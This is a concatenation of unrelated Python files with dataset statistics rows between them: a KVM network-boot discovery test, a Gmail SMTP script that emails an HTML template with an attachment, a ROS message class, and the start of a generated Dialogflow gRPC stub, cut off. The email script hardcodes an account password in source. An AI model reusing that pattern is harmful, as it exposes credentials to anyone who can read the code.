gen = generator.Generator(
api_uri=self.api_uri,
profile_id="%s" % marker,
name="%s" % marker,
ignition_id="%s.yaml" % marker,
matchbox_path=self.test_matchbox_path,
extra_metadata={
"lldp_image_url": self.ec.lldp_image_url,
"etc_hosts": self.ec.etc_hosts,
}
)
gen.dumps()
destroy, undefine = ["virsh", "destroy", "%s" % marker], ["virsh", "undefine", "%s" % marker]
self.virsh(destroy, v=self.dev_null), self.virsh(undefine, v=self.dev_null)
interfaces = {}
try:
virt_install = [
"virt-install",
"--name",
"%s" % marker,
"--network=bridge:rack0,model=virtio",
"--network=bridge:rack0,model=virtio",
"--memory=1024",
"--vcpus=%d" % self.get_optimized_cpu(1),
"--pxe",
"--disk",
"none",
"--os-type=linux",
"--os-variant=generic",
"--noautoconsole",
"--boot=network"
]
self.virsh(virt_install, assertion=True, v=self.dev_null)
for i in range(60):
interfaces = self.fetch_discovery_interfaces()
if len(interfaces) > 0:
break
time.sleep(self.testing_sleep_seconds)
# Just one machine but with 2 interfaces
self.assertEqual(len(interfaces), 2)
for i in interfaces:
self.assertEqual(i["netmask"], 16)
self.assertEqual(i["ipv4"][:9], '172.20.0.')
self.assertEqual(len(i["mac"]), 17)
try:
self.assertTrue(i["as_boot"])
except AssertionError:
self.assertFalse(i["as_boot"])
try:
self.assertEqual(i["name"], "eth0")
except AssertionError:
self.assertEqual(i["name"], "eth1")
self.write_ending(marker)
finally:
self.virsh(destroy)
self.virsh(undefine)
# @unittest.skip("just skip")
class TestKVMDiscoveryClient06(TestKVMDiscoveryClient):
"""
node_nb: 3 with 4 interfaces
Interfaces
"""
def test_06(self):
nb_node = 3
marker = "euid-%s-%s" % (TestKVMDiscoveryClient.__name__.lower(), self.test_06.__name__)
gen = generator.Generator(
api_uri=self.api_uri,
profile_id="%s" % marker,
name="%s" % marker,
ignition_id="%s.yaml" % marker,
matchbox_path=self.test_matchbox_path,
extra_metadata={
"lldp_image_url": self.ec.lldp_image_url,
"etc_hosts": self.ec.etc_hosts,
}
)
gen.dumps()
interfaces = {}
try:
for i in range(nb_node):
machine_marker = "%s-%d" % (marker, i)
destroy, undefine = ["virsh", "destroy", "%s" % machine_marker], \
["virsh", "undefine", "%s" % machine_marker]
self.virsh(destroy, v=self.dev_null), self.virsh(undefine, v=self.dev_null)
virt_install = [
"virt-install",
"--name",
"%s" % machine_marker,
"--network=bridge:rack0,model=virtio",
"--network=bridge:rack0,model=virtio",
"--network=bridge:rack0,model=virtio",
"--network=bridge:rack0,model=virtio",
"--memory=1024",
"--vcpus=%d" % self.get_optimized_cpu(nb_node),
"--pxe",
"--disk",
"none",
"--os-type=linux",
"--os-variant=generic",
"--noautoconsole",
"--boot=network"
]
self.virsh(virt_install, assertion=True, v=self.dev_null)
time.sleep(self.testing_sleep_seconds) # KVM fail to associate nic
for i in range(60):
interfaces = self.fetch_discovery_interfaces()
if len(interfaces) == nb_node * 4:
break
time.sleep(self.testing_sleep_seconds)
# Just one machine but with 4 interfaces
self.assertEqual(len(interfaces), 4 * nb_node)
as_boot = 0
as_not_boot = 0
for i in interfaces:
self.assertEqual(i["netmask"], 16)
self.assertEqual(i["ipv4"][:9], '172.20.0.')
self.assertEqual(len(i["mac"]), 17)
try:
self.assertTrue(i["as_boot"])
as_boot += 1
except AssertionError:
self.assertFalse(i["as_boot"])
as_not_boot += 1
self.assertEqual(as_boot, nb_node)
self.assertEqual(as_not_boot, nb_node * 3)
self.write_ending(marker)
finally:
for i in range(nb_node):
machine_marker = "%s-%d" % (marker, i)
destroy, undefine = ["virsh", "destroy", "%s" % machine_marker], \
["virsh", "undefine", "%s" % machine_marker]
self.virsh(destroy)
self.virsh(undefine)
if __name__ == "__main__":
unittest.main(defaultTest=os.getenv("TEST"))
| 34.585821 | 101 | 0.500755 | 1,828 | 18,538 | 4.879103 | 0.098468 | 0.057181 | 0.018836 | 0.028254 | 0.866465 | 0.823186 | 0.809059 | 0.799641 | 0.799193 | 0.791681 | 0 | 0.017846 | 0.371291 | 18,538 | 535 | 102 | 34.650467 | 0.747405 | 0.030262 | 0 | 0.829787 | 0 | 0 | 0.110569 | 0.019634 | 0 | 0 | 0 | 0 | 0.132388 | 1 | 0.023641 | false | 0 | 0.018913 | 0 | 0.061466 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
43c36a7be98a2c45fce0e27caa343ed4260afcf6 | 19,314 | py | Python | PythonSMTP_HTML-Email.py | itisaby/HacktoberFest2021 | dffeabb306082b276a9065ca318d3adc47bd6177 | [
"MIT"
] | 2 | 2021-10-03T05:54:00.000Z | 2021-10-03T08:11:47.000Z | PythonSMTP_HTML-Email.py | itisaby/HacktoberFest2021 | dffeabb306082b276a9065ca318d3adc47bd6177 | [
"MIT"
] | null | null | null | PythonSMTP_HTML-Email.py | itisaby/HacktoberFest2021 | dffeabb306082b276a9065ca318d3adc47bd6177 | [
"MIT"
] | null | null | null | from email import message
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
import email.mime.application
import email
from jinja2 import Environment
html = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional //EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
<head>
<!--[if gte mso 9]>
<xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
<o:PixelsPerInch>96</o:PixelsPerInch>
</o:OfficeDocumentSettings>
</xml>
<![endif]-->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="x-apple-disable-message-reformatting">
<!--[if !mso]><!--><meta http-equiv="X-UA-Compatible" content="IE=edge"><!--<![endif]-->
<title></title>
<style type="text/css">
table, td { color: #000000; } a { color: #0000ee; text-decoration: underline; } @media (max-width: 480px) { #u_content_text_15 .v-container-padding-padding { padding: 10px 10px 10px 20px !important; } }
@media only screen and (min-width: 620px) {
.u-row {
width: 600px !important;
}
.u-row .u-col {
vertical-align: top;
}
.u-row .u-col-100 {
width: 600px !important;
}
}
@media (max-width: 620px) {
.u-row-container {
max-width: 100% !important;
padding-left: 0px !important;
padding-right: 0px !important;
}
.u-row .u-col {
min-width: 320px !important;
max-width: 100% !important;
display: block !important;
}
.u-row {
width: calc(100% - 40px) !important;
}
.u-col {
width: 100% !important;
}
.u-col > div {
margin: 0 auto;
}
}
body {
margin: 0;
padding: 0;
}
table,
tr,
td {
vertical-align: top;
border-collapse: collapse;
}
p {
margin: 0;
}
.ie-container table,
.mso-container table {
table-layout: fixed;
}
* {
line-height: inherit;
}
a[x-apple-data-detectors='true'] {
color: inherit !important;
text-decoration: none !important;
}
</style>
<!--[if !mso]><!--><link href="https://fonts.googleapis.com/css?family=Lato:400,700&display=swap" rel="stylesheet" type="text/css"><link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700&display=swap" rel="stylesheet" type="text/css"><link href="https://fonts.googleapis.com/css?family=Raleway:400,700&display=swap" rel="stylesheet" type="text/css"><!--<![endif]-->
</head>
<body class="clean-body" style="margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #e7e7e7;color: #000000">
<!--[if IE]><div class="ie-container"><![endif]-->
<!--[if mso]><div class="mso-container"><![endif]-->
<table style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #e7e7e7;width:100%" cellpadding="0" cellspacing="0">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td align="center" style="background-color: #e7e7e7;"><![endif]-->
<div class="u-row-container" style="padding: 0px;background-color: transparent">
<div class="u-row" style="Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #e6a501;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color: transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding: 0px;background-color: transparent;" align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:600px;"><tr style="background-color: #e6a501;"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="600" style="width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;" valign="top"><![endif]-->
<div class="u-col u-col-100" style="max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;">
<div style="width: 100% !important;">
<!--[if (!mso)&(!IE)]><!--><div style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;"><!--<![endif]-->
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:'Open Sans',sans-serif;" align="left">
<table height="0px" align="center" border="0" cellpadding="0" cellspacing="0" width="100%" style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<span> </span>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:'Open Sans',sans-serif;" align="left">
<h1 style="margin: 0px; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word; font-weight: normal; font-family: 'Raleway',sans-serif; font-size: 22px;">
<strong><span style="color: blue;">IEM </span><span style="color: red;"> AI Writer </SPan></strong>
</h1>
</td>
</tr>
</tbody>
</table>
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:'Open Sans',sans-serif;" align="left">
<h1 style="margin: 0px; color: #ffffff; line-height: 110%; text-align: center; word-wrap: break-word; font-weight: normal; font-family: 'Raleway',sans-serif; font-size: 48px;">
<strong>Thank You</strong>
</h1>
</td>
</tr>
</tbody>
</table>
<!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td><![endif]-->
<!--[if (mso)|(IE)]></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<div class="u-row-container" style="padding: 0px;background-color: transparent">
<div class="u-row" style="Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color: transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding: 0px;background-color: transparent;" align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:600px;"><tr style="background-color: #ffffff;"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="600" style="width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;" valign="top"><![endif]-->
<div class="u-col u-col-100" style="max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;">
<div style="width: 100% !important;">
<!--[if (!mso)&(!IE)]><!--><div style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;"><!--<![endif]-->
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:'Open Sans',sans-serif;" align="left">
<div style="line-height: 140%; text-align: left; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 140%;">Generated Output : </p>
</div>
<br>
{{output}} <!-- OUTPUT -->
</td>
</tr>
</tbody>
</table>
<!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td><![endif]-->
<!--[if (mso)|(IE)]></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<div class="u-row-container" style="padding: 0px;background-color: transparent">
<div class="u-row" style="Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color: transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding: 0px;background-color: transparent;" align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:600px;"><tr style="background-color: #ffffff;"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="600" style="width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;" valign="top"><![endif]-->
<div class="u-col u-col-100" style="max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;">
<div style="width: 100% !important;">
<!--[if (!mso)&(!IE)]><!--><div style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;"><!--<![endif]-->
<table id="u_content_text_15" style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:20px 20px 15px;font-family:'Open Sans',sans-serif;" align="left">
<div style="color: #333333; line-height: 160%; text-align: left; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 160%;"><span style="font-size: 16px; line-height: 25.6px; font-family: Lato, sans-serif;">If you have any questions contact us with this link iemaiwriter.com</span></p>
<p style="font-size: 14px; line-height: 160%;"><span style="font-size: 16px; line-height: 25.6px; font-family: Lato, sans-serif;">FeedBack Form Link : https://forms.gle/NMEk78ZpoqW8SVc7A </span></p>
</div>
</td>
</tr>
</tbody>
</table>
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:'Open Sans',sans-serif;" align="left">
<table height="0px" align="center" border="0" cellpadding="0" cellspacing="0" width="100%" style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #939391;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<span> </span>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:14px;font-family:'Open Sans',sans-serif;" align="left">
<div align="center">
<div style="display: table; max-width:187px;">
<!--[if (mso)|(IE)]><table width="187" cellpadding="0" cellspacing="0" border="0"><tr><td style="border-collapse:collapse;" align="center"><table width="100%" cellpadding="0" cellspacing="0" border="0" style="border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:187px;"><tr><![endif]-->
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:'Open Sans',sans-serif;" align="left">
<div style="color: #828080; line-height: 160%; text-align: center; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 160%;">6408 Elizabeth Avenue SE</p>
<p style="font-size: 14px; line-height: 160%;">Auburn WA 98092, USA</p>
</div>
</td>
</tr>
</tbody>
</table>
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:'Open Sans',sans-serif;" align="left">
<table height="0px" align="center" border="0" cellpadding="0" cellspacing="0" width="64%" style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<span> </span>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:0px 10px 20px;font-family:'Open Sans',sans-serif;" align="left">
<div style="color: #828080; line-height: 140%; text-align: center; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 140%;">© 2021 IEM America Corporation. All Rights Reserved.</p>
</div>
</td>
</tr>
</tbody>
</table>
<!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td><![endif]-->
<!--[if (mso)|(IE)]></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
</td>
</tr>
</tbody>
</table>
<!--[if mso]></div><![endif]-->
<!--[if IE]></div><![endif]-->
</body>
</html>
"""
data = "Please find the generated output is Attached below"
html_part = MIMEText(
Environment().from_string(html).render(
output= data
), "html"
)
msg_alternative = MIMEMultipart('alternative')
msg_alternative.attach(html_part)
filename='Blog.txt'
fp=open(filename,'rb')
attachment = email.mime.application.MIMEApplication(fp.read(),_subtype="txt")
fp.close()
attachment.add_header('Content-Disposition', 'attachment', filename='Blog.txt')
msg_mixed = MIMEMultipart('mixed')
msg_mixed.attach(msg_alternative)
msg_mixed.attach(attachment)
msg_mixed['From'] = 'iemaiwriter@gmail.com'
msg_mixed['To'] = str(emaill)
msg_mixed['Subject'] = "|IEM AI Writer| " + modelCall.emailsub()
mailingList = [str(emaill), "iemaiwriter@gmail.com", "chakrabortyrishit96@gmail.com", "suryasekhardatta22@gmail.com"]
smtp_obj = smtplib.SMTP('smtp.gmail.com', 587)
smtp_obj.ehlo()
smtp_obj.starttls()
smtp_obj.ehlo()
smtp_obj.login('iemaiwriter@gmail.com', 'Test@12345')
for reciever in mailingList:
smtp_obj.sendmail(msg_mixed['From'], reciever, msg_mixed.as_string())
smtp_obj.quit()
| 51.095238 | 388 | 0.577509 | 2,331 | 19,314 | 4.772201 | 0.125268 | 0.031553 | 0.040992 | 0.049622 | 0.735347 | 0.722851 | 0.71566 | 0.71521 | 0.708558 | 0.690849 | 0 | 0.041492 | 0.236305 | 19,314 | 377 | 389 | 51.230769 | 0.712678 | 0 | 0 | 0.545455 | 0 | 0.233766 | 0.94318 | 0.294556 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
78dd84caafb15bb4623214a9e9b22cd4f2e33d59 | 1,926 | py | Python | alpyro_msgs/tf2_msgs/lookuptransformactionresult.py | rho2/alpyro_msgs | b5a680976c40c83df70d61bb2db1de32a1cde8d3 | [
"MIT"
] | 1 | 2020-12-13T13:07:10.000Z | 2020-12-13T13:07:10.000Z | alpyro_msgs/tf2_msgs/lookuptransformactionresult.py | rho2/alpyro_msgs | b5a680976c40c83df70d61bb2db1de32a1cde8d3 | [
"MIT"
] | null | null | null | alpyro_msgs/tf2_msgs/lookuptransformactionresult.py | rho2/alpyro_msgs | b5a680976c40c83df70d61bb2db1de32a1cde8d3 | [
"MIT"
] | null | null | null | from typing import Final
from alpyro_msgs import RosMessage
from alpyro_msgs.actionlib_msgs.goalstatus import GoalStatus
from alpyro_msgs.std_msgs.header import Header
from alpyro_msgs.tf2_msgs.lookuptransformresult import LookupTransformResult
class LookupTransformActionResult(RosMessage):
__msg_typ__ = "tf2_msgs/LookupTransformActionResult"
__msg_def__ = "c3RkX21zZ3MvSGVhZGVyIGhlYWRlcgogIHVpbnQzMiBzZXEKICB0aW1lIHN0YW1wCiAgc3RyaW5nIGZyYW1lX2lkCmFjdGlvbmxpYl9tc2dzL0dvYWxTdGF0dXMgc3RhdHVzCiAgdWludDggUEVORElORz0wCiAgdWludDggQUNUSVZFPTEKICB1aW50OCBQUkVFTVBURUQ9MgogIHVpbnQ4IFNVQ0NFRURFRD0zCiAgdWludDggQUJPUlRFRD00CiAgdWludDggUkVKRUNURUQ9NQogIHVpbnQ4IFBSRUVNUFRJTkc9NgogIHVpbnQ4IFJFQ0FMTElORz03CiAgdWludDggUkVDQUxMRUQ9OAogIHVpbnQ4IExPU1Q9OQogIGFjdGlvbmxpYl9tc2dzL0dvYWxJRCBnb2FsX2lkCiAgICB0aW1lIHN0YW1wCiAgICBzdHJpbmcgaWQKICB1aW50OCBzdGF0dXMKICBzdHJpbmcgdGV4dAp0ZjJfbXNncy9Mb29rdXBUcmFuc2Zvcm1SZXN1bHQgcmVzdWx0CiAgZ2VvbWV0cnlfbXNncy9UcmFuc2Zvcm1TdGFtcGVkIHRyYW5zZm9ybQogICAgc3RkX21zZ3MvSGVhZGVyIGhlYWRlcgogICAgICB1aW50MzIgc2VxCiAgICAgIHRpbWUgc3RhbXAKICAgICAgc3RyaW5nIGZyYW1lX2lkCiAgICBzdHJpbmcgY2hpbGRfZnJhbWVfaWQKICAgIGdlb21ldHJ5X21zZ3MvVHJhbnNmb3JtIHRyYW5zZm9ybQogICAgICBnZW9tZXRyeV9tc2dzL1ZlY3RvcjMgdHJhbnNsYXRpb24KICAgICAgICBmbG9hdDY0IHgKICAgICAgICBmbG9hdDY0IHkKICAgICAgICBmbG9hdDY0IHoKICAgICAgZ2VvbWV0cnlfbXNncy9RdWF0ZXJuaW9uIHJvdGF0aW9uCiAgICAgICAgZmxvYXQ2NCB4CiAgICAgICAgZmxvYXQ2NCB5CiAgICAgICAgZmxvYXQ2NCB6CiAgICAgICAgZmxvYXQ2NCB3CiAgdGYyX21zZ3MvVEYyRXJyb3IgZXJyb3IKICAgIHVpbnQ4IE5PX0VSUk9SPTAKICAgIHVpbnQ4IExPT0tVUF9FUlJPUj0xCiAgICB1aW50OCBDT05ORUNUSVZJVFlfRVJST1I9MgogICAgdWludDggRVhUUkFQT0xBVElPTl9FUlJPUj0zCiAgICB1aW50OCBJTlZBTElEX0FSR1VNRU5UX0VSUk9SPTQKICAgIHVpbnQ4IFRJTUVPVVRfRVJST1I9NQogICAgdWludDggVFJBTlNGT1JNX0VSUk9SPTYKICAgIHVpbnQ4IGVycm9yCiAgICBzdHJpbmcgZXJyb3Jfc3RyaW5nCgo="
__md5_sum__ = "ac26ce75a41384fa8bb4dc10f491ab90"
header: Header
status: GoalStatus
result: LookupTransformResult
| 120.375 | 1,454 | 0.961059 | 53 | 1,926 | 34.490566 | 0.45283 | 0.021882 | 0.030635 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096585 | 0.026999 | 1,926 | 15 | 1,455 | 128.4 | 0.878869 | 0 | 0 | 0 | 0 | 0 | 0.780893 | 0.780893 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.416667 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
78f166583c463458fec4433dca372ed00334c148 | 13,424 | py | Python | dialogflow_v2beta1/proto/document_pb2_grpc.py | gertventer1970/dialogflow-python-client-v2 | e78b0e6765f94fb9ecbbc72c9fc30ce7245703e2 | [
"Apache-2.0"
] | 1 | 2020-10-14T07:43:19.000Z | 2020-10-14T07:43:19.000Z | dialogflow_v2beta1/proto/document_pb2_grpc.py | everydaycodings/dialogflow-python-client-v2 | c1c925d94726f49e549870e087ad79ee491056e2 | [
"Apache-2.0"
] | null | null | null | dialogflow_v2beta1/proto/document_pb2_grpc.py | everydaycodings/dialogflow-python-client-v2 | c1c925d94726f49e549870e087ad79ee491056e2 | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from dialogflow_v2beta1.proto import (
document_pb2 as google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2,
)
from google.longrunning import (
operations_pb2 as google_dot_longrunning_dot_operations__pb2,
)
class DocumentsStub(object):
"""Service for managing knowledge [Documents][google.cloud.dialogflow.v2beta1.Document].
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ListDocuments = channel.unary_unary(
"/google.cloud.dialogflow.v2beta1.Documents/ListDocuments",
request_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ListDocumentsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ListDocumentsResponse.FromString,
)
self.GetDocument = channel.unary_unary(
"/google.cloud.dialogflow.v2beta1.Documents/GetDocument",
request_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.GetDocumentRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.Document.FromString,
)
self.CreateDocument = channel.unary_unary(
"/google.cloud.dialogflow.v2beta1.Documents/CreateDocument",
request_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.CreateDocumentRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.DeleteDocument = channel.unary_unary(
"/google.cloud.dialogflow.v2beta1.Documents/DeleteDocument",
request_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.DeleteDocumentRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.UpdateDocument = channel.unary_unary(
"/google.cloud.dialogflow.v2beta1.Documents/UpdateDocument",
request_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.UpdateDocumentRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
self.ReloadDocument = channel.unary_unary(
"/google.cloud.dialogflow.v2beta1.Documents/ReloadDocument",
request_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ReloadDocumentRequest.SerializeToString,
response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
)
class DocumentsServicer(object):
"""Service for managing knowledge [Documents][google.cloud.dialogflow.v2beta1.Document].
"""
def ListDocuments(self, request, context):
"""Returns the list of all documents of the knowledge base.
Note: The `projects.agent.knowledgeBases.documents` resource is deprecated;
only use `projects.knowledgeBases.documents`.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def GetDocument(self, request, context):
"""Retrieves the specified document.
Note: The `projects.agent.knowledgeBases.documents` resource is deprecated;
only use `projects.knowledgeBases.documents`.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def CreateDocument(self, request, context):
"""Creates a new document.
Note: The `projects.agent.knowledgeBases.documents` resource is deprecated;
only use `projects.knowledgeBases.documents`.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def DeleteDocument(self, request, context):
"""Deletes the specified document.
Note: The `projects.agent.knowledgeBases.documents` resource is deprecated;
only use `projects.knowledgeBases.documents`.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def UpdateDocument(self, request, context):
"""Updates the specified document.
Note: The `projects.agent.knowledgeBases.documents` resource is deprecated;
